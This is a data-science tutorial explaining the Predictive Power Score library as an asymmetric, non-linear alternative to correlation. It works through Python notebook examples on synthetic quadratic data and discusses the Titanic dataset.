Have you ever asked:
- Is there a score that tells us if there is any relationship between two columns — no matter if the relationship is linear, non-linear, Gaussian, or some other type of relationship?
- Of course, the score should be asymmetrical because I want to detect all the strange relationships between two variables.
- The score should be
0if there is no relationship and the score should be
1if there is a perfect relationship
- And that the score helps to answer the question Are there correlations between the columns? with a correlation matrix, then you make a scatter plot over the two columns to compare them and see if there is indeed a strong correlation.
- And like the icing on the cake, the score should be able to handle both categorical and numerical columns by default.
In short, an asymmetric and data-type agnostic score for predictive relationships between two columns ranging from
0 to
1. Well, there is the Predictive Power Score library and it can be found at the following link: Predictive Power Score
So, let’s work at the library in this notebook!
Note: you can download the notebook here.
First, we need to install it
In [1]:
!pip3 install ppscore
Calculating the Predictive Power Score
First of all, there is no single way to calculate the Predictive Power Score. In fact, there are many possible ways to calculate a score that meets the requirements mentioned above. So, let’s rather think of the Predictive Power Score as a framework for a family of scores. Let’s say we have two columns and we want to calculate the PPS of
X predicting
Y. In this case, we treat
Y as our target variable and
X as our (only) characteristic.
We can now calculate a cross-validated Decision Tree and calculate an appropriate evaluation metric.
- When the objective is numerical we can use a Regression Decision Tree and calculate the Mean Absolute Error (MAE).
- When the objective is categorical, we can use a Classification Decision Tree and calculate the weighted F1
You can also use other scores like ROC, etc. but let’s leave those doubts aside for a second because we have another problem. Most evaluation metrics do not make sense if you do not compare them to a baseline. It doesn’t matter if we have a score of
0.9 if there are possible scores of
0.95. And it would matter a lot if you are the first person who achieves a score higher than
0.7. Therefore, we need to “normalize” our evaluation score. And how do you normalize a score? You define a lower and an upper limit and put the score in perspective
So what should be the upper and lower limits? Let’s start with the upper limit because this is usually easier: a perfect
F1 is
1. A perfect
MAE is
0.
But what about the lower limit? Actually, we cannot answer this in absolute terms. The lower limit depends on the evaluation metric and its data set. It is the value reached by a “naïve” predictor.
But what is a naive model? For a classification problem, always predicting the most common class is quite naive. For a regression problem, always predicting the median value is quite naive.
Predictive Power Score VS Correlation
To get a better idea of the Predictive Power Score and its differences with the correlation let’s see this versus. We now have the correlations between
x and
y and vice versa
Let’s do with this equation from PPS
In [2]:
import pandas as pd import numpy as np import ppscore as pps
We’ve imported Pandas, Numpy, and PPS
In [3]:
df = pd.DataFrame()
We’ve now created an empty Pandas DataFrame
In [4]:
df
Out[4]:
According to the formula above we need to create the values of features
X, ranging from
-2 to
+2, and we do it as a uniform distribution with Numpy, and we’ll create
10.000 samples and we assign these values to a new column of the empty dataframe called
X
Following the same formula also we will need to create a new column called
error by assigning the values from
-0.5 to
0.5 as uniform distribution and with the same number of samples. We will do the same with Numpy
In [5]:
df["x"] = np.random.uniform(-2, 2, 10000)
In [7]:
df.head()
In [8]:
df["error"] = np.random.uniform(-0.5, 0.5, 10000)
In [9]:
df.head()
Out[9]:
Your data will be different, because is randomly generated.
Great! We have the first half of the formula re-created. Now we’ll need to replicate and create
Y
In [10]:
df["y"] = df["x"] * df["x"] + df["error"]
In [11]:
df.head()
Out[11]:
Very easy, here we follow the formula. Now we want to see the correlations between
X and
Y. For this, we will use the
.corr() of Pandas. For more info here about cor() here. We have two ways to run it:
- 1- On the column:
In [12]:
df["x"].corr(df["y"])
Out[12]:
-0.0115046561021449
- 2- On the DataFrame
In [13]:
df.corr()
Out[13]:
As we can see, the conclusion we would reach here is that the correlation between
X and
Y is not a strong correlation, since the value is
-0.011, which indicates a slight negative correlation. Remember that a strong positive correlation is equal to
1, and a strong negative correlation is equal to
-1 (we saw it in the graphs above). But what happens if we execute this same correlation but with Predictive Power Score? Let’s do it. Based on the above dataframe we can calculate the PPS of
x by predicting
y:
In [14]:
pps.score(df, "x", "y")
Out[14]:
{'x': 'x', 'y': 'y', 'ppscore': 0.675090383548477, 'case': 'regression', 'is_valid_score': True, 'metric': 'mean absolute error', 'baseline_score': 1.025540102508908, 'model_score': 0.33320784136182485, 'model': DecisionTreeRegressor()}
Here we obtain a value of
0.67 which is an indicator of a high positive correlation. Using only the Pandas
corr() we could have lost the predictive power of this variable! Here you can see that this correlation is non-linear
Image By Author
What happens now if we reverse the correlation? Trying to predict
X based on
Y? Let’s see it
In [15]:
pps.score(df, "y", "x")
Out[15]:
{'x': 'y', 'y': 'x', 'ppscore': 0, 'case': 'regression', 'is_valid_score': True, 'metric': 'mean absolute error', 'baseline_score': 1.0083196087945172, 'model_score': 1.1336852173737795, 'model': DecisionTreeRegressor()}
The correlation is now
0, so it has no correlation, meaning that we are facing an asymmetric correlation! Let’s see more details about the PPS library
In [16]:
pps.predictors(df, "y")
Out[16]:
In [17]:
pps.predictors(df, "x")
Out[17]:
With
.predictors we can get a clearer idea of what is going on under the hood. In which we can see the metrics and the models used. We can also access the
.matrix method with the next command
In [18]:
pps.matrix(df)
Out[18]:
This is how we can calculate the PPS matrix between all columns
Analyzing & visualizing results
We call these non-linear effects and asymmetry. Let’s use a typical quadratic relationship: the feature
x is a uniform variable ranging from
-2 to
2 and the target
y is the square of
x plus some
error. In this case,
x can predict very well
y because there is a clear non-linear, quadratic relationship, this is how we generate the data, after all. However, this is not true in the other direction from
y to
x. For example, if
y is 4, it is impossible to predict whether
x was approximately
2 or
-2
Therefore, the prediction ratio of
x to
y is
0.67, detecting the non-linear relationship and saving the day. However, the PPS is not
1 because there is some error in the relationship. In the other direction, the PPS of
y to
x is
0 because its prediction cannot be better than the naive baseline and therefore the score is
0.
You can use seaborn or your favorite library to view the results.
Viewing PPS predictors:
In [19]:
import seaborn as sns predictors_df = pps.predictors(df, y="y") sns.barplot(data=predictors_df, x="x", y="ppscore")
Out[19]:
Visualizing the PPS matrix:
(This needs some minor pre-processing because
seaborn.heatmap unfortunately does not accept sorted data)
In [20]:
matrix_df = pps.matrix(df)[['x', 'y', 'ppscore']].pivot(columns='x', index='y', values='ppscore')matrix_df
Out[21]:
In [22]:
sns.heatmap(matrix_df, vmin=0, vmax=1, cmap="Blues", linewidths=0.5, annot=True)
Out[22]:
It is clear, with this visualization, that we are having a good result with the correlation between
x and
y, but not in the opposite way.
Example with Categorical Features
Comparing the correlation matrix with the PPS matrix of the Titanic data set will give you some new ideas.
The correlation matrix is smaller and leaves out many interesting relationships. Of course, that makes sense because columns like
Sex,
TicketID or
Port are categorical and the correlation cannot be computed for them. The correlation matrix shows a negative correlation between
TicketPrice and
Class
(-0.55)
We can check this relationship if we take a look at the PPS. We will see that the
TicketPrice is a strong predictor for the
Class
(0.9 PPS) but not the other way around. The
Class feature only predicts the
TicketPrice with a PPS of
0.2
This makes sense because if your ticket costs 5,000or5,000or10,000 it’s most likely in the higher class. Conversely, if you know someone was in the highest class you can’t tell whether they paid 5,000or5,000or10,000 for their ticket. In this scenario, the asymmetry of the PPS shines through again.
The first row of the matrix tells you that the best univariate predictor of the
"Survived" column is the
"Sex" column. This makes sense because women were prioritized during the rescue. (We could not find this information in the correlation matrix because the
Sex column was eliminated).
If you look at the
TicketID column, you can see that
TicketID is a pretty good predictor for a range of columns. If you dig deeper into this pattern, you will discover that several people had the same
TicketID. Therefore, the
TicketID actually refers to a latent group of passengers who bought the ticket together, for example, the big Italian family Rossi who turns any night into a show. Thus, the PPS helped you to detect a hidden pattern.
What’s even more surprising than the strong predictive power of
TicketID is the strong predictive power of
TicketPrice across a wide range of columns. Especially, the fact that
TicketPrice is quite good at predicting
TicketID (0.67) and vice versa
(0.64)
Upon further investigation, you will discover that the tickets were often uniquely priced. For example, only the Italian Rossi family paid a price of $72.50. This is a critical view! It means that the
TicketPrice contains information about the
TicketID and therefore about our Italian family. Information that you need to have when you consider a possible leakage of information.
By looking at the PPS matrix, we can see the effects that could be explained by the causal chains. For example, you would be surprised why
TicketPrice has predictive power on the survival rate
(PPS 0.39). But if you know that the
Class influences your survival rate
(PPS 0.36) and that
TicketPrice is a good predictor for your
Class (PPS 0.9), then you might have found an explanation
Disclosure
PPS clearly has some advantages over correlation in finding predictive patterns in the data. However, once patterns are found, correlation is still a great way to communicate the linear relationships found. Therefore, you can use the PPS matrix as an alternative to the correlation matrix to detect and understand linear or non-linear patterns in your data
Limitations
- The calculation is slower than the correlation (matrix).
- The score cannot be interpreted as easily as the correlation because it does not tell you anything about the type of relationship that was found. Therefore, the PPS is better at finding patterns but the correlation is better at communicating the linear relationships found.
- You cannot compare the scores of different target variables in a strictly mathematical way because they are calculated using different evaluation metrics. Scores are still valuable in the real world, but this must be kept in mind.
- There are limitations to the components used under the hood
Conclusions
- In addition to your usual feature selection mechanism, you can use the PPS to find good predictors for your target column.
- You can also remove features that only add random noise.
- Those features sometimes still score high on the feature importance metric.
- You can remove features that can be predicted by other features because they do not add new information
- You can identify pairs of mutually predictive characteristics in the PPS matrix — this includes strongly correlated characteristics but will also detect non-linear relationships.
- Detect leakage: Use the PPS matrix to detect leakage between variables — even if the leakage is mediated by other variables.
- Data normalization: Find entity structures in the data by interpreting the PPS matrix as a directed graph. This can be surprising when the data contain latent structures that were previously unknown. For example, the TicketID in the Titanic data set is often a flag for a
References
I have written this other Notebook about Datetimes in Python. I invite you to read it!
I hope you enjoyed this reading! you can follow me on Twitter or LinkedIn
Thank you for reading!
Leave a Reply Your email address will not be published. Required fields are marked * | https://www.analyticsvidhya.com/blog/2020/12/using-predictive-power-score-to-pinpoint-non-linear-correlations/ | CC-MAIN-2022-33 | refinedweb | 2,805 | 55.64 |
On Thu, 2004-04-15 at 09:25, Jim Fulton wrote:
From the zope package README.txt:
"Zope Project Packages
The zope package is a pure namespace package holding packages developed as part of the Zope 3 project.
Advertising
Generally, the immediate subpackages of the zope package should be useful and usable outside of the Zope application server. Subpackages of the zope package should have minimal interdependencies, although most depend on zope.interfaces.
Speaking as someone who's tried to use zope subpackages outside of z3, there are practical problems with this. About 8 months ago, I tried to pull ZPT, et al out to use as a standalone version. I ended up having to grab zope.interfaces, zope.pagetemplates, zope.tal, zope.tales, and zope.i18n. All make sense (especially since I wanted internationalized ZPT), but tracking all the dependencies were difficult. I tried to update all that again a few weeks ago and found that I also now needed zope.i18nmessageid and zope.schema.
It looks like Fred's packaging work will help with the very tricky task
of figuring out the dependencies and creating distutils packages for the
desired stuff.
Eactly. Freds work is going to adress this problem. (I'll restrain myself from going into a tirade about how important this is for Python. :)
I've also heard that zope.schema is going away
I thin it will eventually be merged into zope.interface.
> and that
the dependency on both zope.i18n and zope.i18nmessageid might not be necessary.
Right, maybe
But I'm still concerned that there will be creeping dependencies among more things inside the zope package, making it harder to use some of those technologies independently. E.g. there are several standalone ZPT implementations in the wild, but I happen to think z3's is the best and would like to see it adopted more widely in the Python world.
We're aware of this problem. That's why we've decoded to make the dependency data explicit (manually created) rather than implicit (automatically created).
Each separately distributed package will have a DEPENDENCIES.cfg that is created by hand and that *constrains* dependencies on other packages. It makes explicit the intended dependencies. Dependencies not listed here are bugs. Adding depenencies to this file should be considered a big deal.
Also, for a long time I've wanted to see z3's interfaces package be used outside Zope3, perhaps even being adopted as a standard library package eventually. I wonder if living inside the zope container package helps or hurts those prospects.
Probably neither. I doubt that there will ever be a standard Python interface system. I'm not going to hold my breath. Guido argued for having Zope's interfaces be in s subpackage (or have a weird name) specifically to make it easier to add a standard interface package later, assuming that a standard package might not be exactly the same as Zope's.
I understand the desire to carve out a package namespace that z3 can reliably use without risk of collision with other packages. I still think that's less of a practical concern in the Python world
We've had colisions in the past. That's why we're being careful now.
(BTW, I think it was a mistake to have top-level persistent and transaction packages. I think that will eventually come back to haunt us.)
The only way to avoid collissions is to pick stupid names (zthis, zthat). I much prefer z.this to zthis. This assumes that we can make it easy to install z.this into z.
> so I'd opt
for an approach that gets the non-Zope specific technologies into the most hands of Python programmers.
I think that that's a different discussion. The safest thing to do for now is to continue using a container package.
Jim
-- Jim Fulton mailto:[EMAIL PROTECTED] Python Powered! CTO (540) 361-1714 Zope Corporation
_______________________________________________
Zope-Dev maillist - [EMAIL PROTECTED]
** No cross posts or HTML encoding! **
(Related lists - ) | https://www.mail-archive.com/zope-dev@zope.org/msg15877.html | CC-MAIN-2016-44 | refinedweb | 673 | 66.64 |
Language in C Interview Questions and Answers
Ques 46. How do I print a floating-point number with higher precision say 23.34568734 with only precision up to two decimal places?
Ans. This can be achieved through the use of suppression char '*' in the format string of printf( ) as shown in the following program.
main( )
{
int i = 2 ;
float f = 23.34568734 ;
printf ( "%.*f", i, f ) ;
}
The output of the above program would be 23.35.
Is it helpful? Add Comment View Comments
Ques 47. Are the expressions *ptr++ and ++*ptr same?
Ans. No. *ptr++ increments the pointer and not the value pointed by it, whereas ++*ptr increments the value being pointed to by ptr.
Is it helpful? Add Comment View Comments
Ques 48. strpbrk( )
Ans. The function strpbrk( ) takes two strings as parameters. It scans the first string, to find, the first occurrence of any character appearing in the second string. The function returns a pointer to the first occurrence of the character it found in the first string. The following program demonstrates the use of string function strpbrk( ).
#include <string.h>
main( )
{
char *str1 = "Hello!" ;
char *str2 = "Better" ;
char *p ;
p = strpbrk ( str1, str2 ) ;
if ( p )
printf ( "The first character found in str1 is %c", *p ) ;
else
printf ( "The character not found" ) ;
}
The output of the above program would be the first character found in str1 is e
div( )...
The function div( ) divides two integers and returns the quotient and remainder. This function takes two integer values as arguments; divides first integer with the second one and returns the answer of division of type div_t. The data type div_t is a structure that contains two long ints, namely quot and rem, which store quotient and remainder of division respectively. The following example shows the use of div( ) function.
#include <stdlib.h>
void main( )
{
div_t res ;
res = div ( 32, 5 ) ;
printf ( "\nThe quotient = %d and remainder = %d ", res.quot, res.rem ) ;
Is it helpful? Add Comment View Comments
Ques 49. Can we convert an unsigned long integer value to a string?
Ans. The function ultoa( ) can be used to convert an unsigned long integer value to a string. This function takes three arguments, first the value that is to be converted, second the base address of the buffer in which the converted number has to be stored (with a string terminating null character '\0') and the last argument specifies the base to be used in converting the value. Following example demonstrates the use of this function.
#include <stdlib.h>
void main( )
{
unsigned long ul = 3234567231L ;
char str[25] ;
ultoa ( ul, str, 10 ) ;
printf ( "str = %s unsigned long = %lu\n", str, ul ) ;
}
Is it helpful? Add Comment View Comments
Ques 50. ceil( ) and floor( )
Ans. The math function ceil( ) takes a double value as an argument. This function finds the smallest possible integer to which the given number can be rounded up. Similarly, floor( ) being a math function, takes a double value as an argument and returns the largest possible integer to which the given double value can be rounded down. The following program demonstrates the use of both the functions.
#include <math.h>
void main( )
{
double no = 1437.23167 ;
double down, up ;
down = floor ( no ) ;
up = ceil ( no ) ;
printf ( "The original number %7.5lf\n", no ) ;
printf ( "The number rounded down %7.5lf\n", down ) ;
printf ( "The number rounded up %7.5lf\n", up ) ;
}
The output of this program would be,
The original number 1437.23167
The number rounded down 1437.00000
The number rounded up 1438.00000
Is it helpful? Add Comment View Comments
Most helpful rated by users:
- What will be the output of the following code?
void main ()
{ int i = 0 , a[3] ;
a[i] = i++;
printf ("%d",a[i]) ;
}
- Why doesn't the following code give the desired result?
int x = 3000, y = 2000 ;
long int z = x * y ;
- Why doesn't the following statement work?
char str[ ] = "Hello" ;
strcat ( str, '!' ) ;
- How do I know how many elements an array can hold?
- How do I compare character data stored at two different memory locations? | http://www.withoutbook.com/Technology.php?tech=11&page=10&subject= | CC-MAIN-2018-34 | refinedweb | 679 | 75.2 |
Thursday, March 24, 2016¶
super() in the
__str__() of a python_2_unicode_compatible¶
Here is now how to reproduce #844.
The following code snippet was used to reproduce #844:
>>> from lino import startup >>> startup('lino_welfare.projects.std.settings.doctests') >>> from lino.api.doctest import * >>> obj = households.Member() >>> print(obj) Member object
Explanation starts in
lino_xl.lib.households.models which
defines:
@python_2_unicode_compatible class Member(mixins.DatePeriod): def __str__(self): if self.person_id is None: return super(Member, self).__str__() if self.role is None: return unicode(self.person) return u"%s (%s)" % (self.person, self.role)
This code, on its own, is not problematic. The problem comes only when
Lino Welfare extends the Member model. In
lino_welfare.modlib.households.models it says:
class Member(Member, mixins.Human, mixins.Born): ...
And in
lino.mixins.human we have:
from lino_xl.lib.households.models import * @python_2_unicode_compatible class Human(model.Model): def __str__(self): return self.get_full_name(nominative=True)
The rule of thumb is: Don’t use :func:`super` in the :meth:`__str__` method of a `python_2_unicode_compatible` model.
My explanation is that python_2_unicode_compatible causes something
to get messed up with the mro for the
__str__() method, but I
wont’t dive deeper into this right now because my problem was fixed by
changing the relevant line:
return super(Member, self).__str__()
into an explicit copy of the code which I want to run there (defined
in the
super() of Django’s
Model class):
return str('%s object' % self.__class__.__name__)
I added a section about “Member objects” in Households to cover it.
Moving from fabric to invoke¶
I wanted to get the Lino test suite pass on Travis CI. It took me
almost the whole day. Lots of subtle changes in
atelier.
The main problem was to understand how invoke does configuration and to decide how to store current_project and how to define configration variables. I added an invoke.yaml to most projects.
Many more
inv commands now work.
fab bd was the easiest: it simply wasn’t yet imported into the
atelier.tasks module.
There was a bug in
atelier.utils.confirm() which made it fail
under Python 2 when the prompt was a unicode string with non-ascii
characters.
# -*- coding: UTF-8 -*- from __future__ import unicode_literals from atelier.utils import confirm confirm("Ein schöner Tag?")
Above script gives:
Traceback (most recent call last): File "0324.py", line 4, in <module> confirm("Ein schöner Tag?") File "/atelier/atelier/utils.py", line 213, in confirm ln = input(prompt) UnicodeEncodeError: 'ascii' codec can't encode character u'\xf6' in position 7: ordinal not in range(128)
A simplified version:
# -*- coding: UTF-8 -*- from __future__ import unicode_literals from atelier.utils import confirm confirm("Ein schöner Tag?")
But finally I can not do:
$ pp inv clean $ pp inv prep test bd pd
I released Atelier 0.0.20 to PyPI (needed because Travis CI uses the released version)
And the reward: the Lino test suite now passes on Travis CI using invoke instead of fabric! At least for Python 2. | http://luc.lino-framework.org/blog/2016/0324.html | CC-MAIN-2018-05 | refinedweb | 500 | 52.46 |
Getting Started
First, download the FMOD Ex Programmers API. You’ll want the latest Stable version. After the installation completes, open Visual Studio and create an empty Win32 console project.
Right-click on the project node in Solution Explorer, select Properties, choose VC++ Directories in the left-hand pane and add the following directory paths:
Include Directories: C:\Program Files (x86)\FMOD SoundSystem\FMOD Programmers API Windows\api\inc
Library Directories: C:\Program Files (x86)\FMOD SoundSystem\FMOD Programmers API Windows\api\lib
In the Linker -> Input section, add fmodex_vc.lib to the Additional Dependencies.
Finally, when your application runs, you’ll need fmodex.dll to be in the same folder as your exe file, so to make things simple you can add a post-build event to copy this automatically from the FMOD API directory to your target folder when the build succeeds. Go to Build Events -> Post-build Event and set the Command Line as follows:
copy /y "C:\Program Files (x86)\FMOD SoundSystem\FMOD Programmers API Windows\api\fmodex.dll" "$(OutputPath)"
When you start writing your application, you’ll want to include the following headers:
#include "fmod.hpp"
#include "fmod_errors.h"
#include <iostream>
Since most FMOD functions return an error code, it is also handy to have some kind of error checking function you can wrap around all the calls, like this:
void FMODErrorCheck(FMOD_RESULT result)
{
    if (result != FMOD_OK)
    {
        std::cout << "FMOD error! (" << result << ") " << FMOD_ErrorString(result) << std::endl;
        exit(-1);
    }
}
Initializing FMOD
The following code is adapted from the ‘Getting Started with FMOD for Windows’ PDF file which is included with the API and can be found in your Windows Start Menu under FMOD Sound System. I have made some small tweaks and added further explanation below.
First we’ll want to get a pointer to
FMOD::System, which is the base interface from which all the other FMOD objects are created:
FMOD::System *system;
FMOD_RESULT result;
unsigned int version;
int numDrivers;
FMOD_SPEAKERMODE speakerMode;
FMOD_CAPS caps;
char name[256];

// Create FMOD interface object
result = FMOD::System_Create(&system);
FMODErrorCheck(result);
Then we want to check that the version of the DLL is the same as the libraries we compiled against:
// Check version
result = system->getVersion(&version);
FMODErrorCheck(result);

if (version < FMOD_VERSION)
{
    std::cout << "Error! You are using an old version of FMOD " << version << ". This program requires " << FMOD_VERSION << std::endl;
    return 0;
}
Next, count the number of sound cards in the system, and if there are no sound cards present, disable sound output altogether:
// Get number of sound cards
result = system->getNumDrivers(&numDrivers);
FMODErrorCheck(result);

// No sound cards (disable sound)
if (numDrivers == 0)
{
    result = system->setOutput(FMOD_OUTPUTTYPE_NOSOUND);
    FMODErrorCheck(result);
}
If there is at least one sound card, get the speaker mode (stereo, 5.1, 7.1 etc.) that the user has selected in Control Panel, and set FMOD's speaker output mode to match. The first parameter is the driver ID – where 0 is the first enumerated sound card (driver) and numDrivers - 1 is the last. The third parameter receives the default sound frequency; we have set this to zero here as we're not interested in retrieving this data.
// Get the capabilities of the default (0) sound card
result = system->getDriverCaps(0, &caps, 0, &speakerMode);
FMODErrorCheck(result);

// Set the speaker mode to match that selected in Control Panel
result = system->setSpeakerMode(speakerMode);
FMODErrorCheck(result);
If hardware acceleration is disabled in Control Panel, we need to make the software buffer larger than the default to help guard against skipping and stuttering. The first parameter specifies the number of samples in the buffer, and the second parameter specifies the number of buffers (which are used in a ring). Therefore the total number of samples to be used for software buffering is the product (multiplication) of the two numbers.
// Increase buffer size if user has Acceleration slider set to off
if (caps & FMOD_CAPS_HARDWARE_EMULATED)
{
    result = system->setDSPBufferSize(1024, 10);
    FMODErrorCheck(result);
}
The following is a kludge for SigmaTel sound drivers. We first get the name of the first enumerated sound card driver by specifying zero as the first parameter to
getDriverInfo (the 4th parameter receives the device GUID which we ignore here). If it contains the string ‘SigmaTel’, the output format is changed to PCM floating point, and all the other format settings are left as the sound card’s current settings.
// Get the name of the first enumerated sound card driver
// (the 4th parameter would receive the device GUID, which we ignore by passing 0)
result = system->getDriverInfo(0, name, 256, 0);
FMODErrorCheck(result);

// SigmaTel devices crackle with PCM 16-bit output; PCM floating point solves it
if (strstr(name, "SigmaTel"))
{
    result = system->setSoftwareFormat(48000, FMOD_SOUND_FORMAT_PCMFLOAT, 0, 0, FMOD_DSP_RESAMPLER_LINEAR);
    FMODErrorCheck(result);
}
We have now done all the necessary pre-requisite legwork and we can now initialize the sound system:
// Initialise FMOD result = system->init(100, FMOD_INIT_NORMAL, 0);
The first parameter defines the number of virtual channels to use. This can essentially be any number: whenever you start to play a new sound or stream, FMOD will (by default) pick any available free channel. The number of actual hardware channels (voices) available is irrelevant, as FMOD will downmix where needed to give the illusion of more channels playing than there actually are in the hardware. So just pick any number that is more than the total number of sounds that will ever be playing simultaneously in your application. If you choose a number lower than this, channels will get re-used and already-running sounds will get cut off and replaced by new ones if you try to start a sound when all channels are busy (the oldest used channel is re-used first).
The second parameter gives initialization parameters and the third number specifies driver-specific information (the example given in the documentation is a filename when using the WAV-writer). The initialization parameter will usually be
FMOD_INIT_NORMAL, but for example if you are developing for PlayStation 3, you might use a parameter like
FMOD_INIT_PS3_PREFERDTS to prefer DTS output over Dolby Digital.
If the speaker mode we selected earlier is for some strange reason invalid,
init() will return
FMOD_ERR_OUTPUT_CREATEBUFFER. In this case, we reset the speaker mode to a safe fallback option – namely stereo sound – and call
init());
All of the code above should be included in every application you write which uses FMOD. With this boilerplate code out of the way, we can get to the business of making some noise!
Playing sounds and songs
There are two main ways to get audio into FMOD –
createSound and
createStream.
createSound loads a sound file into memory in its entirety, and decompresses it if necessary, whereas
createStream opens a file and just buffers it a piece at a time, decompressing each buffered segment on the fly during playback. Each option has its advantages and disadvantages, but in general music should be streamed since decompressing an MP3 or Vorbis file of some minutes length in memory will consume some 10s of megabytes, whereas sound effects that will be used repeatedly and are relatively short can be loaded into memory for quick access.
To load a sound into memory:
FMOD::Sound *audio;
system->createSound("Audio.mp3", FMOD_DEFAULT, 0, &audio);
To open a stream:
FMOD::Sound *audioStream;
system->createStream("Audio.mp3", FMOD_DEFAULT, 0, &audioStream);
The first parameter is the relative pathname of the file to open and the 4th parameter is a pointer to an
FMOD::Sound pointer that receives the resource handle of the audio. Under normal circumstances the 2nd and 3rd parameters should be left as
FMOD_DEFAULT and
0 (the 2nd is the mode in which to open the audio, the 3rd is an extended information structure used in special cases – we will come to this in Part 3 of the series).
Playing a one-shot sound
To play a sound that doesn’t loop and which you don’t otherwise need any control over, call:
system->playSound(FMOD_CHANNEL_FREE, audio, false, 0);
This is the same whether you are playing a sound or a stream; you use
playSound in both cases.
FMOD_CHANNEL_FREE causes FMOD to choose any available unused virtual channel on which to play the sound as mentioned earlier. The 2nd parameter is the audio to play. The third parameter specifies whether the sound should be started paused or not. This is useful when you wish to make changes to the sound before it begins to play.
If you need control of the sound after it starts, use the 4th parameter to receive the handle of the channel that the sound was assigned to:
FMOD::Channel *channel; system->playSound(FMOD_CHANNEL_FREE, audio, false, &channel);
These calls are non-blocking so they return as soon as they are processed and the sound plays in the background (in a separate thread).
Manipulating the channel
Once a sound is playing and you have the channel handle, all future interactions with that sound take place through the channel. For example, to make a sound loop repeatedly:
channel->setMode(FMOD_LOOP_NORMAL); channel->setLoopCount(-1);
To toggle the pause state of the sound:
bool isPaused; channel->getPaused(&isPaused); channel->setPaused(!isPaused);
To change the sound volume, specify a float value from 0.0 to 1.0, eg for half volume:
channel->setVolume(0.5f);
Per-frame update
Although it’s only needed on certain devices and in certain environments, it is best to call FMOD’s update function on each frame (or cycle of your application’s main loop):
system->update();
This causes OSs such as Android to be able to accept incoming phone calls and other notifications.
Releasing resources
Release the FMOD interface when you are finished with it (generally, when the application is exiting):
system->release();
This will cause all channels to stop playing, and for the channels and main interface to be released. Channels therefore don’t need to be released when the application ends, but sounds should be released when you’re done with them (thanks to David Gouveia for the correction!):
audio->release();
Don’t forget to error check
Everything above should be wrapped in calls to our
FMODErrorCheck() function above or some other error-trapping construct. I have just omitted this in the examples for clarity.
Demo application
All of the techniques shown in this article can be seen in this FMOD Demo console application, which shows how to open and play sounds and streams and how to do a smooth volume fade from one track to another. Full source code and the compiled executable are included. The source code can also be seen here for your convenience:
#include "fmod.hpp" #include "fmod_errors.h" #include <iostream> #include <Windows.h> #define _USE_MATH_DEFINES #include <math.h> void FMODErrorCheck(FMOD_RESULT result) { if (result != FMOD_OK) { std::cout << "FMOD error! (" << result << ") " << FMOD_ErrorString(result) << std::endl; exit(-1); } } int main() { // ================================================================================================ // Application-independent initialization // ================================================================================================ FMOD::System *system; FMOD_RESULT result; unsigned int version; int numDrivers; FMOD_SPEAKERMODE speakerMode; FMOD_CAPS caps; char name[256]; // Create FMOD interface object result = FMOD::System_Create(&system); FMODErrorCheck(result); // Check version result = system->getVersion(&version); FMODErrorCheck(result); if (version < FMOD_VERSION) { std::cout << "Error! You are using an old version of FMOD " << version << ". This program requires " << FMOD_VERSION << std::endl; return 0; } // Get number of sound cards result = system->getNumDrivers(&numDrivers); FMODErrorCheck(result); // No sound cards (disable sound) if (numDrivers == 0) { result = system->setOutput(FMOD_OUTPUTTYPE_NOSOUND); FMODErrorCheck(result); } //); // Increase buffer size if user has Acceleration slider set to off if (caps & FMOD_CAPS_HARDWARE_EMULATED) { result = system->setDSPBufferSize(1024, 10); FMODErrorCheck(result); } //); } } // Initialise FMOD result = system->init(100, FMOD_INIT_NORMAL,); // ================================================================================================ // Application-specific code // ================================================================================================ bool quit = false; bool fading = false; int fadeLength = 3000; int fadeStartTick; // Open music as a stream FMOD::Sound *song1, *song2, *effect; result = system->createStream("Song1.mp3", FMOD_DEFAULT, 0, &song1); 
FMODErrorCheck(result); result = system->createStream("Song2.mp3", FMOD_DEFAULT, 0, &song2); FMODErrorCheck(result); // Load sound effects into memory (not streaming) result = system->createSound("Effect.mp3", FMOD_DEFAULT, 0, &effect); FMODErrorCheck(result); // Assign each song to a channel and start them paused FMOD::Channel *channel1, *channel2; result = system->playSound(FMOD_CHANNEL_FREE, song1, true, &channel1); FMODErrorCheck(result); result = system->playSound(FMOD_CHANNEL_FREE, song2, true, &channel2); FMODErrorCheck(result); // Songs should repeat forever channel1->setLoopCount(-1); channel2->setLoopCount(-1); // Print instructions std::cout << "FMOD Simple Demo - (c) Katy Coe 2012 -" << std::endl << "=====================================================" << std::endl << std::endl << "Press:" << std::endl << std::endl << " 1 - Toggle song 1 pause on/off" << std::endl << " 2 - Toggle song 2 pause on/off" << std::endl << " F - Fade from song 1 to song 2" << std::endl << " S - Play one-shot sound effect" << std::endl << " Q - Quit" << std::endl; while (!quit) { // Per-frame FMOD update FMODErrorCheck(system->update()); // Q - Quit if (GetAsyncKeyState('Q')) quit = true; // 1 - Toggle song 1 pause state if (GetAsyncKeyState('1')) { bool isPaused; channel1->getPaused(&isPaused); channel1->setPaused(!isPaused); while (GetAsyncKeyState('1')); } // 2 - Toggle song 2 pause state if (GetAsyncKeyState('2')) { bool isPaused; channel2->getPaused(&isPaused); channel2->setPaused(!isPaused); while (GetAsyncKeyState('2')); } // F - Begin fade from song 1 to song 2 if (GetAsyncKeyState('F')) { channel1->setVolume(1.0f); channel2->setVolume(0.0f); channel1->setPaused(false); channel2->setPaused(false); fading = true; fadeStartTick = GetTickCount(); while (GetAsyncKeyState('F')); } // Play one-shot sound effect (without storing channel handle) if (GetAsyncKeyState('S')) { system->playSound(FMOD_CHANNEL_FREE, effect, false, 0); while (GetAsyncKeyState('S')); } // Fade 
function if fade is in progress if (fading) { // Get volume from 0.0f - 1.0f depending on number of milliseconds elapsed since fade started float volume = min(static_cast<float>(GetTickCount() - fadeStartTick) / fadeLength, 1.0f); // Fade is over if song 2 has reached full volume if (volume == 1.0f) { fading = false; channel1->setPaused(true); channel1->setVolume(1.0f); } // Translate linear volume into a smooth sine-squared fade effect volume = static_cast<float>(sin(volume * M_PI / 2)); volume *= volume; // Fade song 1 out and song 2 in channel1->setVolume(1.0f - volume); channel2->setVolume(volume); } } // Free resources FMODErrorCheck(song1->release()); FMODErrorCheck(song2->release()); FMODErrorCheck(effect->release()); FMODErrorCheck(system->release()); }
For A Quick & Dirty Solution
I have made a simple FMOD library which wraps all of the code above and the code in subsequent parts of the series up into an easy-to-use class. Check out the link for more information.
Coming Up…
In Part 2 of our series on FMOD we will take a look at channel groups. I hope you found this tutorial introduction useful!!
Hello Katy!
Are you sure about the bit about releasing the system also releasing the loaded sound objects? I’m somewhat confused by the documentation, which I quote:
